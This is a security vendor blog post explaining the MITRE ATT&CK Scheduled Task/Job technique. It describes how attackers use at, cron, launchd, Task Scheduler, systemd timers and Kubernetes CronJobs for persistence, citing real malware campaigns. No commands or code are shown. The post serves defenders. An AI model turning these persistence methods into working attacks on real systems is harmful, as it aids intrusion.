Double Your Threat Blocking in 90 Days
Huseyin Can YUCEEL & Picus Labs | April 18, 2022
The Top 10 MITRE ATT&CK Techniques Used by Adversaries
Picus Labs published The Red Report 2023 research and the 10 Most Prevalent MITRE ATT&CK techniques used by adversaries. The study analyzes over 200,000 malware samples and gives insights to help you defend.
We are continuing our blog series on the techniques listed in The Picus Red Report 2023 Top Ten List. In this blog, we explained the T1053 Scheduled Task/Job technique of the MITRE ATT&CK framework.
The Red Report 2023
Establishing persistence in the victim’s network is an essential objective for adversaries. Otherwise, they would need to repeat their initial access tactics to access the target system each time and risk being detected. Adversaries use task scheduling utilities of operating systems to execute malicious payloads on a defined schedule or at system startup to achieve persistence.
Operating systems and platforms provide utilities to automate the execution of programs or scripts on a defined schedule:
A scheduled task or job is a command, program, or script to be executed periodically (e.g., every Friday at 1:00 a.m.) or when a certain event occurs (e.g., a user logs on the system). Legitimate users, like domain administrators, use scheduled tasks to create and run operational tasks automatically.
at is a command-line tool that allows users to schedule commands in various operating systems, such as Unix-like operating systems (e.g., BSD, macOS, and Linux distributions) and Microsoft Windows. Although this sub-technique covers the at command within Linux, it may be extended to other Unix-like operating systems.
Adversary Use of At (Linux)
The at utility in Linux allows users to schedule commands to be executed only once at a particular time. An adversary may use the at command to schedule one-time execution of malicious code at a point in time in the future.
In addition to a graphical user interface (GUI) for Task Scheduler, Microsoft Windows offers two native command-line utilities for task scheduling: schtasks.exe and at.exe.
There are two requirements to use the at command in Windows:
Adversary Use of At (Windows)
Adversaries utilize at.exe to create recurring tasks that run periodically. For example, at.exe can be used to establish persistence and keep reverse shell sessions alive.
at.exe can also be used to run a command on remote systems. For example, the TG-0416 Threat Group uses at.exe for lateral movement . BRONZE BUTLER APT group uses the at command to execute a malicious batch file on a remote system during lateral movement.
Cron is a utility to configure scheduled tasks in Unix-like operating systems. It can schedule tasks to periodically execute a command, script, or program. As mentioned above, at is also a task scheduling utility in Unix-like OSs. However, they have different use cases. While cron is suitable for repetitive tasks, at is suitable for one-time tasks.
Adversary Use of At (Cron)
Adversaries use cron to establish persistence and execute their malicious payloads at regular intervals. For example, attackers use cron to run the downloaded malicious payload every minute in the Ngrok Mining Botnet campaign.
Launchd is the OS service management daemon that boots the system and loads and maintains services for macOS. It is similar to Service Control Manager on Microsoft Windows and systemd on Linux distributions.
Adversary Use of Launchd
Launchd is the first process launched after the kernel when a macOS system starts up. Adversaries use the launchd daemon to schedule their malicious executables to run at system startup. As an example, the Olyx macOS backdoor uses launchd to ensure the backdoor executable automatically launches when the user logs in .
This sub-technique refers to Windows Task Scheduler . Windows Task Scheduler enables users to schedule tasks with time-based or event-based triggers.
Task Scheduler also supports the use of multiple triggers.
Adversary Use of Scheduled Task
Systemd has provided timers that can be used as an alternative to cron. Timers provided by systemd include built-in support for calendar and monotonic time events, as well as the ability to run asynchronously. Therefore, adversaries can abuse systemd timers to perform task scheduling .
Like cron jobs, systemd timers enable adversaries to trigger a script or program at specified intervals (e.g., once a week, every 5 minutes during business hours from 8 a.m. to 6 p.m., on the first Monday of each month) .
Systemd timers also allow for more precise control of events than cron jobs do. For example, it enables attackers to trigger a script or program to run a specific time after an event, such as startup, completion of a previous task, or even the completion of the service unit called by the timer.
Adversary Use of Systemd Timers
A malware found in the Arch Linux AUR package repository uses systemd timers . When the user installs the xeactor package, the user’s machine downloads and executes the "x.sh" file. Then, the x.sh file downloads and executes another file named "u.sh", modifies systemd, and adds a timer to run the "u.sh" file every 360 seconds with the below code :
Container Orchestration Job covers task scheduling functionalities provided by container orchestration tools. For example, Kubernetes provides the CronJob workload (application) for task scheduling similar to cron jobs on a Linux system. Adversaries may abuse this functionality to schedule the deployment of containers configured to execute malicious code .
A CronJob generates Jobs on a recurring basis, and a Job can be used to run containers that perform finite tasks for batch jobs . A CronJob object corresponds to a single line in a crontab (cron table) file in Linux . It executes a job on a specified schedule in Cron format.
Adversary use of Container Orchestration Job
A CronJob is used to automate routine tasks such as backups and report generation. Each of those tasks should be configured to repeat indefinitely (for example, once a day/week /month); you can specify a time interval within which the job should begin. Attackers may use CronJobs to schedule the execution of malicious code that would run as a container in the cluster .
 Microsoft Corporation, “Backdoor:MacOS_X/Olyx.A.” https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:MacOS_X/Olyx.A.
 “Qakbot levels up with new obfuscation techniques.” http://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html.
 R. Falcone, “Shamoon 2: Return of the Disttrack Wiper,” 30-Nov-2016. https://unit42.paloaltonetworks.com/unit42-shamoon-2-return-disttrack-wiper/.
 “Use systemd timers instead of cronjobs.” https://opensource.com/article/20/7/systemd-timers.
 C. Cimpanu, “Malware Found in Arch Linux AUR Package Repository,” BleepingComputer, 10-Jul-2018. https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/.
 Y. Weizman, “Threat matrix for Kubernetes,” 02-Apr-2020. https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/.